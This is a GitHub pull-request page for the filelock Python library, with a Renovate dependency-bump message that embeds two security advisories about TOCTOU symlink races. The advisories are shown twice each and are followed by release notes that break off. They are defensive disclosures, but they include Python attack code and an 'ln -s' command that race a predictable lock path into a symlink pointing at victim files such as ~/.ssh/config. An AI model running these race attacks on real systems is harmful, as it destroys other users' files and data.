🐛 fix(api): reject dropped lock options - #646
Merged
Merged
Conversation
Narrow subclass signatures could discard requested safety policies while construction succeeded. Cache each subclass model, forward keyword-capable constructors, and reject non-default options that cannot reach the instance.
gaborbernat
force-pushed
the
fix/628-subclass-options
branch
from
July 14, 2026 02:01
ace2beb to
837cb3a
Compare
gaborbernat
marked this pull request as ready for review
July 14, 2026 02:06
renovate-coop-norge Bot
added a commit
to coopnorge/engineering-docker-images
that referenced
this pull request
Jul 16, 2026
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.29.7` → `3.30.0` |  |  | --- ### filelock has a TOCTOU race condition which allows symlink attacks during lock file creation [CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) / [GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) / PYSEC-2026-1375 <details> <summary>More information</summary> #### Details ##### Impact A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. **Who is impacted:** All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries: - **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths - **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures - **poetry/tox users**: through using virtualenv or filelock on their own. Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. ##### Patches Fixed in version **3.20.1**. **Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\_acquire() to prevent symlink following. **Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\_acquire(). **Users should upgrade to filelock 3.20.1 or later immediately.** ##### Workarounds If immediate upgrade is not possible: 1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases) 2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks 3. Monitor lock file directories for suspicious symlinks before running trusted applications **Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended. ______________________________________________________________________ ##### Technical Details: How the Exploit Works ##### The Vulnerable Code Pattern **Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`): ```python def _acquire(self) -> None: ensure_directory_exists(self.lock_file) open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist? open_flags |= os.O_CREAT fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate ``` **Windows** (`src/filelock/_windows.py:19-28`): ```python def _acquire(self) -> None: raise_on_not_writable_file(self.lock_file) # (1) Check writability ensure_directory_exists(self.lock_file) flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate ``` ##### The Race Window The vulnerability exists in the gap between operations: **Unix variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file exists? → False T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` **Windows variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file writable? T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink/junction → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` ##### Step-by-Step Attack Flow **1. Attacker Setup:** ```python ##### Attacker identifies target application using filelock lock_path = "/tmp/myapp.lock" # Predictable lock path victim_file = "/home/victim/.ssh/config" # High-value target ``` **2. Attacker Creates Race Condition:** ```python import os import threading def attacker_thread(): # Remove any existing lock file try: os.unlink(lock_path) except FileNotFoundError: pass # Create symlink pointing to victim file os.symlink(victim_file, lock_path) print(f"[Attacker] Created: {lock_path} → {victim_file}") ##### Launch attack threading.Thread(target=attacker_thread).start() ``` **3. Victim Application Runs:** ```python from filelock import UnixFileLock ##### Normal application code lock = UnixFileLock("/tmp/myapp.lock") lock.acquire() # ← VULNERABILITY TRIGGERED HERE ##### At this point, /home/victim/.ssh/config is now 0 bytes! ``` **4. What Happens Inside os.open():** On Unix systems, when `os.open()` is called: ```c // Linux kernel behavior (simplified) int open(const char *pathname, int flags) { struct file *f = path_lookup(pathname); // Resolves symlinks by default! if (flags & O_TRUNC) { truncate_file(f); // ← Truncates the TARGET of the symlink } return file_descriptor; } ``` Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file. ##### Why the Attack Succeeds Reliably **Timing Characteristics:** - **Check operation** (Path.exists()): ~100-500 nanoseconds - **Symlink creation** (os.symlink()): ~1-10 microseconds - **Race window**: ~1-5 microseconds (very small but exploitable) - **Thread scheduling quantum**: ~1-10 milliseconds **Success factors:** 1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts 2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations 3. **No synchronization**: No atomic file creation prevents the race 4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation) ##### Real-World Attack Scenarios **Scenario 1: virtualenv Exploitation** ```python ##### Victim runs: python -m venv /tmp/myenv ##### Attacker racing to create: os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg") ##### Result: /home/victim/.bashrc overwritten with: ##### home = /usr/bin/python3 ##### include-system-site-packages = false ##### version = 3.11.2 ##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker ``` **Scenario 2: PyTorch Cache Poisoning** ```python ##### Victim runs: import torch ##### PyTorch checks CPU capabilities, uses filelock on cache ##### Attacker racing to create: os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock") ##### Result: Trained ML model checkpoint truncated to 0 bytes ##### Impact: Weeks of training lost, ML pipeline DoS ``` ##### Why Standard Defenses Don't Help **File permissions don't prevent this:** - Attacker doesn't need write access to victim_file - os.open() with O_TRUNC follows symlinks using the *victim's* permissions - The victim process truncates its own file **Directory permissions help but aren't always feasible:** - Lock files often created in shared /tmp directory (mode 1777) - Applications may not control lock file location - Many apps use predictable paths in user-writable directories **File locking doesn't prevent this:** - The truncation happens *during* the open() call, before any lock is acquired - fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks ##### Exploitation Proof-of-Concept Results From empirical testing with the provided PoCs: **Simple Direct Attack** (`filelock_simple_poc.py`): - Success rate: 33% per attempt (1 in 3 tries) - Average attempts to success: 2.1 - Target file reduced to 0 bytes in \<100ms **virtualenv Attack** (`weaponized_virtualenv.py`): - Success rate: ~90% on first attempt (deterministic timing) - Information leaked: File paths, Python version, system configuration - Data corruption: Complete loss of original file contents **PyTorch Attack** (`weaponized_pytorch.py`): - Success rate: 25-40% per attempt - Impact: Application crashes, model loading failures - Recovery: Requires cache rebuild or model retraining **Discovered and reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 6.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f) - [https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1) - [https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants) - [https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-w853-jp5j-5j7f) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### filelock has a TOCTOU race condition which allows symlink attacks during lock file creation [CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) / [GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) / PYSEC-2026-1375 <details> <summary>More information</summary> #### Details ##### Impact A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. **Who is impacted:** All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries: - **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths - **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures - **poetry/tox users**: through using virtualenv or filelock on their own. Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. ##### Patches Fixed in version **3.20.1**. **Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\_acquire() to prevent symlink following. **Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\_acquire(). **Users should upgrade to filelock 3.20.1 or later immediately.** ##### Workarounds If immediate upgrade is not possible: 1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases) 2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks 3. Monitor lock file directories for suspicious symlinks before running trusted applications **Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended. ______________________________________________________________________ ##### Technical Details: How the Exploit Works ##### The Vulnerable Code Pattern **Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`): ```python def _acquire(self) -> None: ensure_directory_exists(self.lock_file) open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist? open_flags |= os.O_CREAT fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate ``` **Windows** (`src/filelock/_windows.py:19-28`): ```python def _acquire(self) -> None: raise_on_not_writable_file(self.lock_file) # (1) Check writability ensure_directory_exists(self.lock_file) flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate ``` ##### The Race Window The vulnerability exists in the gap between operations: **Unix variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file exists? → False T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` **Windows variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file writable? T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink/junction → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` ##### Step-by-Step Attack Flow **1. Attacker Setup:** ```python ##### Attacker identifies target application using filelock lock_path = "/tmp/myapp.lock" # Predictable lock path victim_file = "/home/victim/.ssh/config" # High-value target ``` **2. Attacker Creates Race Condition:** ```python import os import threading def attacker_thread(): # Remove any existing lock file try: os.unlink(lock_path) except FileNotFoundError: pass # Create symlink pointing to victim file os.symlink(victim_file, lock_path) print(f"[Attacker] Created: {lock_path} → {victim_file}") ##### Launch attack threading.Thread(target=attacker_thread).start() ``` **3. Victim Application Runs:** ```python from filelock import UnixFileLock ##### Normal application code lock = UnixFileLock("/tmp/myapp.lock") lock.acquire() # ← VULNERABILITY TRIGGERED HERE ##### At this point, /home/victim/.ssh/config is now 0 bytes! ``` **4. What Happens Inside os.open():** On Unix systems, when `os.open()` is called: ```c // Linux kernel behavior (simplified) int open(const char *pathname, int flags) { struct file *f = path_lookup(pathname); // Resolves symlinks by default! if (flags & O_TRUNC) { truncate_file(f); // ← Truncates the TARGET of the symlink } return file_descriptor; } ``` Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file. ##### Why the Attack Succeeds Reliably **Timing Characteristics:** - **Check operation** (Path.exists()): ~100-500 nanoseconds - **Symlink creation** (os.symlink()): ~1-10 microseconds - **Race window**: ~1-5 microseconds (very small but exploitable) - **Thread scheduling quantum**: ~1-10 milliseconds **Success factors:** 1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts 2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations 3. **No synchronization**: No atomic file creation prevents the race 4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation) ##### Real-World Attack Scenarios **Scenario 1: virtualenv Exploitation** ```python ##### Victim runs: python -m venv /tmp/myenv ##### Attacker racing to create: os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg") ##### Result: /home/victim/.bashrc overwritten with: ##### home = /usr/bin/python3 ##### include-system-site-packages = false ##### version = 3.11.2 ##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker ``` **Scenario 2: PyTorch Cache Poisoning** ```python ##### Victim runs: import torch ##### PyTorch checks CPU capabilities, uses filelock on cache ##### Attacker racing to create: os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock") ##### Result: Trained ML model checkpoint truncated to 0 bytes ##### Impact: Weeks of training lost, ML pipeline DoS ``` ##### Why Standard Defenses Don't Help **File permissions don't prevent this:** - Attacker doesn't need write access to victim_file - os.open() with O_TRUNC follows symlinks using the *victim's* permissions - The victim process truncates its own file **Directory permissions help but aren't always feasible:** - Lock files often created in shared /tmp directory (mode 1777) - Applications may not control lock file location - Many apps use predictable paths in user-writable directories **File locking doesn't prevent this:** - The truncation happens *during* the open() call, before any lock is acquired - fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks ##### Exploitation Proof-of-Concept Results From empirical testing with the provided PoCs: **Simple Direct Attack** (`filelock_simple_poc.py`): - Success rate: 33% per attempt (1 in 3 tries) - Average attempts to success: 2.1 - Target file reduced to 0 bytes in \<100ms **virtualenv Attack** (`weaponized_virtualenv.py`): - Success rate: ~90% on first attempt (deterministic timing) - Information leaked: File paths, Python version, system configuration - Data corruption: Complete loss of original file contents **PyTorch Attack** (`weaponized_pytorch.py`): - Success rate: 25-40% per attempt - Impact: Application crashes, model loading failures - Recovery: Requires cache rebuild or model retraining **Discovered and reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 6.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f) - [https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1) - [https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants) - [https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html) - [https://pypi.org/project/filelock](https://pypi.org/project/filelock) - [https://github.com/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) - [https://nvd.nist.gov/vuln/detail/CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) This data is provided by [OSV](https://osv.dev/vulnerability/PYSEC-2026-1375) and the [PyPI Advisory Database](https://redirect.github.com/pypa/advisory-database) ([CC-BY 4.0](https://redirect.github.com/pypa/advisory-database/blob/main/LICENSE)). </details> --- ### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock [CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) / [GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw) / PYSEC-2026-1374 <details> <summary>More information</summary> #### Details ##### Vulnerability Summary **Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock **Affected Component:** `filelock` package - `SoftFileLock` class **File:** `src/filelock/_soft.py` lines 17-27 **CWE:** CWE-362, CWE-367, CWE-59 --- ##### Description A TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. ##### Attack Scenario ``` 1. Lock attempts to acquire on /tmp/app.lock 2. Permission validation passes 3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock 4. os.open() tries to create lock file 5. Lock operates on attacker-controlled target file or fails ``` --- ##### Impact _What kind of vulnerability is it? Who is impacted?_ This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization. **Affected Users:** - Applications using `filelock.SoftFileLock` directly - Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy) **Consequences:** - **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed - **Denial of Service** - attacker can prevent lock file creation by maintaining symlink - **Resource serialization failures** - multiple processes may acquire "locks" simultaneously - **Unintended file operations** - lock could operate on attacker-controlled files **CVSS v4.0 Score:** 5.6 (Medium) **Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N **Attack Requirements:** - Local filesystem access to the directory containing lock files - Permission to create symlinks (standard for regular unprivileged users on Unix/Linux) - Ability to time the symlink creation during the narrow race window --- ##### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation. **Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0) **Mitigation Details:** - The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support - On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented - On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented **Users should:** - Upgrade to the patched version when available - For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock` --- ##### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ For users unable to update immediately: 1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146) 2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories: ```bash chmod 700 /path/to/lock/directory ``` 3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation 4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations --- ##### References _Are there any links users can visit to find out more?_ - **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock) - **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html - **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html - **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html - **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html - **GitHub Repository:** https://github.com/tox-dev/filelock --- **Reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw) - [https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) - [https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0) - [https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-qmgc-5h2g-mvrw) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock [CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) / [GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw) / PYSEC-2026-1374 <details> <summary>More information</summary> #### Details ##### Vulnerability Summary **Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock **Affected Component:** `filelock` package - `SoftFileLock` class **File:** `src/filelock/_soft.py` lines 17-27 **CWE:** CWE-362, CWE-367, CWE-59 --- ##### Description A TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. ##### Attack Scenario ``` 1. Lock attempts to acquire on /tmp/app.lock 2. Permission validation passes 3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock 4. os.open() tries to create lock file 5. Lock operates on attacker-controlled target file or fails ``` --- ##### Impact _What kind of vulnerability is it? Who is impacted?_ This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization. **Affected Users:** - Applications using `filelock.SoftFileLock` directly - Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy) **Consequences:** - **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed - **Denial of Service** - attacker can prevent lock file creation by maintaining symlink - **Resource serialization failures** - multiple processes may acquire "locks" simultaneously - **Unintended file operations** - lock could operate on attacker-controlled files **CVSS v4.0 Score:** 5.6 (Medium) **Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N **Attack Requirements:** - Local filesystem access to the directory containing lock files - Permission to create symlinks (standard for regular unprivileged users on Unix/Linux) - Ability to time the symlink creation during the narrow race window --- ##### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation. **Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0) **Mitigation Details:** - The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support - On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented - On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented **Users should:** - Upgrade to the patched version when available - For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock` --- ##### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ For users unable to update immediately: 1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146) 2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories: ```bash chmod 700 /path/to/lock/directory ``` 3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation 4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations --- ##### References _Are there any links users can visit to find out more?_ - **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock) - **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html - **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html - **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html - **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html - **GitHub Repository:** https://github.com/tox-dev/filelock --- **Reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw) - [https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) - [https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0) - [https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://pypi.org/project/filelock](https://pypi.org/project/filelock) - [https://github.com/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw) This data is provided by [OSV](https://osv.dev/vulnerability/PYSEC-2026-1374) and the [PyPI Advisory Database](https://redirect.github.com/pypa/advisory-database) ([CC-BY 4.0](https://redirect.github.com/pypa/advisory-database/blob/main/LICENSE)). </details> --- ### Release Notes <details> <summary>tox-dev/py-filelock (filelock)</summary> ### [`v3.30.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.30.0) [Compare Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.29.7...3.30.0) <!-- Release notes generated using configuration in .github/release.yaml at 3.30.0 --> #### What's Changed - 🎨 style: readability cleanup across the library by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#598](https://redirect.github.com/tox-dev/filelock/pull/598) - 🐛 fix(api): ignore lifetime on native OS locks by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#593](https://redirect.github.com/tox-dev/filelock/pull/593) - 🐛 fix(unix): don't mutate lock file before acquiring flock by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#594](https://redirect.github.com/tox-dev/filelock/pull/594) - soft: evict a non-regular lock file without reading it by [@​dxbjavid](https://redirect.github.com/dxbjavid) in [tox-dev/filelock#597](https://redirect.github.com/tox-dev/filelock/pull/597) - 🐛 fix(windows): bind reparse-point check to the locked handle by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#596](https://redirect.github.com/tox-dev/filelock/pull/596) - 🐛 fix(api): make native lock release transactional by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#615](https://redirect.github.com/tox-dev/filelock/pull/615) - 🐛 fix(soft): make marker writes and cleanup transactional by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#614](https://redirect.github.com/tox-dev/filelock/pull/614) - 🐛 fix(windows): open the lock file through NtCreateFile by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#617](https://redirect.github.com/tox-dev/filelock/pull/617) - ✨ feat(api): add context\_error\_policy for dual context failures by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#618](https://redirect.github.com/tox-dev/filelock/pull/618) - 📝 docs: correct Unix lock-file cleanup and flock claims by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#623](https://redirect.github.com/tox-dev/filelock/pull/623) - ✨ feat(api): add close\_error\_policy for post-unlock close errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#619](https://redirect.github.com/tox-dev/filelock/pull/619) - 